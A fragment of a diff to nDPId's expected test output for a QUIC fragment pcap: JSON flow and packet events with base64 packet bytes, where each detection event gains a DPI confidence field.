+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495372662,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1621495373983,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495373983,"pkt":"AAAAAAAAAAEAguyCCABFAAViV+9AAH4RzFOokEAFdZR1HtxAAbsFTibcwv8AAB0I75EoiW8nS2MAAEU0WdJTtqNtt8MG+zLwh\/UU3FC0zniGr+PwIYUTXnhvS3bBdoRiWOeQ6UKjsBPDLjzDF8dFmOoLoxM9+m6lJwiTWxBqM9JUROj0mguvgkrLqNleDSC7iL4hCrMFjunTfX143sRFPit0bAYIzwvgUuwziEoLnaNvtvkGhiSGOZBzuMVKjTdQ3xkwHQprnY0xWrgmo5nbvHjVfWNFH\/cNC6CCbHqicnUmFRKcm3GMda\/4MP3KAIT+eLw69zCa9uvIEzvXVRl3WvkyZ33qNGuVD+ZvXm9w23J53\/4rlJ3V4StfZ\/Gc4auuB1eSwLog30QSMnyjUcNeP2ibhvLh5O9C35kjOeF\/aDhH1pEcJyXVmWp2G68qb90M\/uLiMTEotX538dX2dgaJ8rTyVlafTtMntoi6sOfMJJIEXEELAkMd2DlCsTy2VQD3iHqC0iVc1r1aw72L8yAQx1n5XURSMoIPLN2keObRP7lr6WcPJ6IMB39kTrMiBZ08mgOSU4GO1bvLA97jrgIr2nR\/Gj8wpcCcF3CPGlyDolBI9IH5a9k9R8RAIrgIzGkXnS9L6V8Nx0Bh6hPBxQnczqK5QuOqW\/vH9tfepppWUj5CKgAm1D02Fq0vKwjtMqpw6ZpAMihlJy9GCI2fNnxnQBbKEz6V\/so8\/ex8K+F2VV8Xlyk+BTFA4OPjxuQ6LZAw3MP6P3hxfm\/8ljkop5\/SI5xDRLcIAhlRNjSOdekQz1mIEo2EnDfSaSb7Gh75g3Y7WAgPEF6enaKqdFVGutsJVL+sNhw8qX0fBTToiOiB9CtWfJJRB1ff5ir4HCC5YgaG7Iny5R+T9zRuNyBNfZ4NPpiM+4EzimASiGJobUimGvk4GeUDE7fXrp72sRKhQCaH5\/nbha+9DmZgdr9mXrl2kbe9PV+IIrHpoitDn2tgzsP8r7ZFigp5npQffggv7haoAs8RFxW9SWR7ZNwh359zkE34\/kZ+CsTC3o+SFo1ZpZSYB7k5YMEXpbC5soIvzfLzo7VRt8wN+9a6G3Vxv65dYuC7WRoZGIss7sDsEtxaXd7D7HVuHBRBXtjzJYxAPsSQ91kS08TNtb53+I8qD12sc9NYwBxuGsxMraUNa\/Z\/\/E6cT8Coz5pCr9T27zIJBVcwrMWBRLfD+FD7WGlOX4REoNLW9dEFCROTtm6uBjditXnfFQ3MtyI4J3eKSt1aSAY6Hz5X1+DPOtei\/MOVBQGkMiqOrqu16dWphn6\/fshP4r6aWOrs7o67fomPJMNklnJkNanI86YjHvOE\/IjKudTLTEMkvMLUoZDWAtPQI+\/WYe66yUXkF7V0ZUo3ZIpLMlb5eVtuVMMe41GbHTf7qBkz676upo7ZFzgy0W42sY9gv7IriIXjYeDyZZDWo3TXCZ38h2Odbwls27Y01zUpB1YjLJf8LFOrRGSs7foRQrQDCkRPXFEc+6E+4fyYet1KpR47gVT419Ib+RJ9wJcl8ubiwrwMsSCENWlSShhkjiU9pREjVRHxJEn4uNAQz5HqwovfWEJcoieIC9oBUbwvwJMD31UWIE3vVHNJaV39UM1zitDAcHoAAw\/EaepuByZJ8czcyTY5trioI79lkjIUaQJwmyfwrWakn1mQxUudBvtAjxi8fCoWLp4XRoQiq88+b3SOVBDyWq6VLJeRBFDKqM\/C9BcOXa854dRZRXM61wBpYF32zaqLJBZ2zo0wYIk8viyYL\/mHrapgu+COKp2gV7Zvqdk13fOuL7gcwxx10cPHj+3nKWmr2kTbsXN3ZtBTVrm3"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495373983,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495208068,"flow_last_seen":1621495208068,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":58703,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1621495383906,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495383906,"pkt":"AAAAAAAAAAEA4PSECABFAAViG3tAAH4RcImokEAFie75AuA2AbsFTlZLwf8AAB0IkppBKZS2LWkAAEU0nZo4YZNOB4fchGmOnQKbaxZNu5+Rr9SHX\/+7nFbe3XcSn7NN4aZ8B34cI7rnBTgQPp7tDwb8aXE40NyFem3MElRtWbSgMUM8aL9mxQMt+BCtQtjknkoexLmgGym9SA4WETS+zt+sAqDuGybHtZbawAHOviOxar3NbIVfoyoECjzoxetvFQVMgJnBjFTieWPpv9GYlKtfw8vM+ABHtzCBdkVQrEtjZ2Kym5ZKNXBHERbHk7EYzIr+2EtCXPa8Zb8ZMSGVK5HAEFoUzTKCNaNkRU63dDqeoGw0HO03e3yfnEfPvmCKjFUtfo9FOxIdx7SRmN9cfYd\/5oUQ5rYUoic5STd5ys9Wj6gQeoYou3SNjAUyctcoqcQEZnGD0JnDrFdxtPksDZ5mOj9TjcCRvxSpY2BRzN1XD7P28JBy8RqTnX8VU3MUTvfBajgOzODfKpBvMnq1DnDxAJmoeuFL5GlkBD4PjdD9dOXUm8xpPRrQyN93MDy9Lh0jdKnypCUIRX+bQzDgeadkOYIZQaX60ccQFMHav4EcM87LkFI2Kkt53wfsAbzwSkC\/sh5h+SKq5tWBr0A1+3COF2lmckeKRU37IJzgJRoclYfhyc5rysBbxh\/R8QZagVscGvoIOTayHYdJgNSs+ZQPUrY4MPNmoN6JKTjH9znGk8iQeNCxiuG4V\/iY6kK6x7AHF+\/rOforM7vc9c9xJuHH84tB0GmhBnyEob1rqD1zr4gpm2RteHorokh0IIRvCPptRZoPaSZ9NqseHmcV5YB9nzZXE4EDYo5f21RhnJLRnSslkj\/H219xwcR0XpMABos3On6qE9aY\/3dpratV\/uRejtrJjhSs43oZgIHypnRSOndd2zbpHR6gwc1xqIlwmu2mdOfB5bN2SKDS9FrSjqrzVx\/YW7gsqVvZYwKID5GJDPL1+LDs4fSPxdv6XMlw2dUT14Sq6cmPktyOFMZDEpK3HY4woBwm6vbhQpvAMOjG\/cyfvzapnRKKIOQSKnlGKbaihsN4mN1DABU\/AfcDRRjAdMEtVd098nAmg10LnfyE7f03sy2ezkhaOC8JAbJCJ+a9vBBI+EmcRWBsTfEX0tClNpXHrzX9DBQjMlBsSvVL3XnUgxicHNjPexCgWSnjBlIvFbkywpKcuzQkbhTg9p+EBuDI3LT2jEBiFGiWVAx1y3mNzzHbk9D3mTlp7QoNQHrpJbKVUKG3U0qdfkUT9BiOKjC4IBDsIt8+AuPFyVhrJ41NR8s0HejzpT6naGZbPieiVEnxW02zCwTQqyslurLWiPYuYizgWR26delkajTuI6BXQG5p3YGrqA+A+Zr7i661IjrsehT8FKL\/V2MDzuE\/fP6ylibvsyekoNKqSvsdEHi89orwhxyl8c5nq\/r8IFg7NvNFyGe\/nKumTxsqUu84Wo6HMgJtg262riyvhJrlldWx+jqgnOBAU4fls6MeuW9Cq4qfm6zU4VLXh5IjH1Py8vkruKnwZ8+Xm7\/tlv\/NhWcWkrOwYFZ6bck7+PZYh+NCodWvjJkVSe5MVzgI8PZy8sRLAK9bvUjxnANGxlVZm4cGfAi5tPOM9l2JM\/1yBZrGjk15cVdpdJnrXVfidMwtlWkoPIudRiKM1qGHsus7EcmploXydZ5\/mH\/0EBq9GCTOEjPkEjEYTQWlyjMdSzxKkqwTQu+I56FkdCZnSSthnsnb7XfGlpRYLkV5VeNoKc5d4pjMVNe\/52pvZLqjGj1nZ61WYiUzCCKq0\/Mnr55qnV\/nzBawGQP496cN5M\/m"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495383906,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495210744,"flow_last_seen":1621495210744,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":55066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -409,13 +409,13 @@
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1621495395690,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495395690,"pkt":"AAAAAAAAAAEAaACzCABFAAVipg1AAH4RMnKokEAFZsLPs\/vxAbsFTg6Cyf8AAB0IgUbFpekOVCYAAEU06GZplAywEKbDCry5EETbpzZHS\/+ctZDEn8Qt8L+3XSgP\/QRbpKkvR3yjoYtHtOItTMP\/J9UsAdqCBdh2rnjFpD\/S9p5j0gqi6\/Z5LmmjTugi+3+2A56Su6KOgULzmrxxoMX8gDCxL9pwT\/\/glMxGOhJ4KTE7\/blbunZ4lQxY\/EmNDFVvwHdoRWRACFfA2iR5CCdBd+3oRtGglHNhFr484NI+Z0RCCnj6E8AMli0JlpZ0hOoK0ivmNTzcFwyySmvpxcFwAg61RSntAgfdC0AGtzo4y3UyaZFQPiRvQeQ5nDJnAqsRbTErzj9AMcpCH6TNnGDJD0Ipet45Eucx3uf3XRPDZLSwoVaO2XwE2UBC8Ypp8ROduqM0LgVHk447061aycTCZaXsHqFtEtV17WT4QoFolsGo\/UuLmbdX4fBh9oVrJJ6pOpcDVi8TH4RI3BivD2J\/kdhdSoFhpuq9YHZnkvDprncZdKcWDI0Lxyf7dDBIXI6bz3C\/x45+PMZ5I1dYqWfeP+n9Y3LOO7s6QV1unXf+WTWJninotKr714Vq9AIzRTrefbOMjhaLqyDLlF5BdYSUM5gTgoPx49oQDRPdJ7a1MBm3APpLT35YHdyilv3tfmjks4fEBltqUPxcJZgUmaDN8Rf0f9lFyt1ioE71sp+8mTyxpZ5VwhjoUvmI6EVuUtNMadIk6x7X+Na\/ZARvdabmPF6toMqDEGLm725EBI3YzGTOL\/mUoC2LE6FomE3JALJPAVmbpR4S5wvkGnqIDrYguIT1mH03jUtbD1hZrfYwo021rdvbZLGkDSbpKanoX6hwE3Xrh1lMhepvhHUBD1PwvjeXOI7ihVhjK62JiMIu8Xu\/CJCx8fRyNbu2z3w2vupOcdoe8Me++EE6n4DCv72t6GfNDeRXyJbfYF6HEwhjRaciKZIHOh3RmNhiDn948Y74LD0+AM5oAbTJWX9LP04itY9ClWH5flhojTFFOwFZGPSRv1WJb9w1NiX\/N6BELu1vs9NZqPkryvurnhZqOqcfs0xRh5Yws7xmPi75Cfr0EjgDLZmPnSK9Y2aijxhpaUW3oVEcSvgOQCztfKmRdvEfJGGR1+Ab4qZqwOtaHuFs1m3m5ld2K1YbnXeki071UWEWPHiSDavs3THubRh\/o9H82GNqi43q6kiCPUzuXIYnPl+Cn6Bp0DOI3AsGU2\/KAkOoIEJE2LFhqvu46T1GcVIcHlsWEVdPTRo4jfFS7lOaoMoNQ7tWcO86aXKUliVbxXv5NVI829JeM\/\/o0yJSZEVnCcvF7FQUmQL68fe3HTGGXZLOWm6c8wVFxl\/6Picm\/V2seHAOz1GMyw3T+bveM5m3rTBwie2mjtgPR7Yxl\/toB3aVEEDYkXEjyef9LN5zZnFChQQhZbecsd8YeFC+QCwamJ2Z23sTUHkrJ+MQqoJhxOAy\/\/Mwszyy7rcrV8gwkK31aMi30M1V3LKqHqJwnB7ugO6A1F6C9gihRhNkgUIVGt68JTdFCaAxsePYd75UEwv5xBcMHiXC3mGwQ+y4AOXGpwXeDQ5\/80Oa9w9+Ml9Rg+Isc3Ld1fmePt84drp\/daoWi9ZMQIajY2lyuqw61Alyxt59OKE3k0CpOAZduHghg0VQSWOAoUcp6o4NHFl4k3rCWuqNQa\/VkHvrA5AVBpsEMxOi5Ga9XYSlw2wK3vwxguwIpXfyLWhpqq0F0AkEDoBDw95NZlTkcuA91L8OJ790NaIAtZ2\/VKU0Ox\/ZEHiQDtz8sykDoB5BoN8A0Dq4L8aU"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495395690,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1621495406541,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495406541,"pkt":"AAAAAAAAAAEAguyCCABFAAViWAZAAH4RzDyokEAFdZR1HtkUAbsFTjoPw\/8AAB0IpS3BjFDLjIQANwBT7u2pdIqujeX7dANOUZTfnxYRmwoEAlv2cGTwvVRQ05f2ZqQkJC4DQmQ8UNekM\/B\/b5bCsc1E\/TyztkqJFBdbO9qB5JeKWS4bDeTB1XZ2V0ErVv64RKGTuBvdjjgCfX06su07x0Z3asXbqdCmQWMHOI1qTINqU\/oJKTNqX7IQ8f85\/qgrCdnviYFuqVMz9SBqVmpNYNfu5FP0maF7snVSzjZqhhCpRZsxX21PAu9uVnhiEb\/LUX9+7+xtXcTtey2D4GkwD4RpLMRUga1FJ4rjTGwvE0+AsvJJDdiioVoqv7\/LjuVI5T7U\/lJ3SCSYuTsqGMVwkymjUknc45YgYS64+q3tWvD9MnWpueOOG1aytIWYz\/ZQgMDZNokTq3aqJGp\/FoTSi+dPRPc1z4wXa0iO2cF402cWDgjuPmatByfDq7YBu2C9+eZYtfPRDsT4VCBhIJO5WiI7+kwTM88vMDXogMlbA3\/6bmTdrTzLvTcHCw3Xr0WehWXYo+xQSWRhu\/uuhl128v5pUOiXsl0bDy5EmHbr20S6kbHO+0LqHDJVbRf8mZ3awQ4pwAWwQWnVx37XBa\/2EtrHyyojkS2zQTcHh1fe+CoFmAvaJovW\/StICtvQrvayaHiBV733DAwKy\/Y3526K9OrAU4jsURbnovvToOxvx8drWx9RSU6gdEHnV8zWJwVS1TDnXtsWGtomfdqnhZkNK5u7kj47rGJaFqQU1bObGeviiSoviHnYR18MNvE78MR8EUodW3McLRHAztvvQBcBcNtZ9NnBwkRaprMMq72CixCPd107Y7JgoGmIJbNdeGCCwkpwtckTVEVe619QplF0gBYNsFWF5Ai1oxBkmUGx9kWUDs80leQJlP0r7jJUvcdLFEZrISVVdyQaoJZQMMFPymMKeYyC4YzW1ORpCrB6TKj0+6uYFK1klVAzDEVUYF1Hhucybp0Qq\/MxedWLGVKQWT9257chXwP2PvqI7qxShbETVSxB44evGFNEZRr76ml\/LnDy58xg1d5gvwegl\/7+gkPhbIJMtvVZ+JkXETJtQnFRG1xeTTfchP0QvUjmmxpySWiNd6gaGLNTi33HeRHy8SHIM278nUZ9GMr0cdwZ08VWlOCTuhU3E2u1I\/6ZvxNK5D41TNPq02++dEJhlyjbw3keY6r\/soji\/n+9pmP7QmojV\/lfE3GxJ+ePOip0nlns4O8V5YSSKtilDr8GhCJyf\/pzZk3drO1EwJLp4rnbhLue2grZuQbO3+kxcT96eAE85Hb0noB3Ea+uU3gj5MXJ0wkPH06qnXVxrDVuFF03yGp55TKUZyKSkRVZizQRkR0CmmMb9p+7ighEtptb4miGyv2eDl9F+SDCwhUssSw7vl8IKL3NVUcKAYGcE7Ie2BdrDpWQqSHhL0i5ZWiHn2aNx9IPMwmexAO\/AP+DEpPg\/OqQFS9+cLRPrMs6a5TPZqg++wfD+EHXSSwEIbMZk7820Ent7o0O6fPU9oivUvzxIErtdOu9fjOuTeCbtNL0UGBzvnoRPMUaIQjfu\/iJG8Z9aOtg+9TrcjVPX5a6Z5OwLXmzLGRT86sNwHqCjRgn2p2rVLx+fb+Z3Te8nZPOzZZjVZ6Ycx5SyZ9mziyd8btUND9hahYJM6KENGcOZwT1hkXcbxXROTQMsrykz+appT+Yt7eTfiM5Bijfzp++ctCCHMYRqgsN0FBlmqroqwE0JLDBDcemxPFQhEjVYok4hZ20aOLFNcrukblRhA1kFXY6Llbu6x+OdQ5ITJjtfy6N7s1G"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
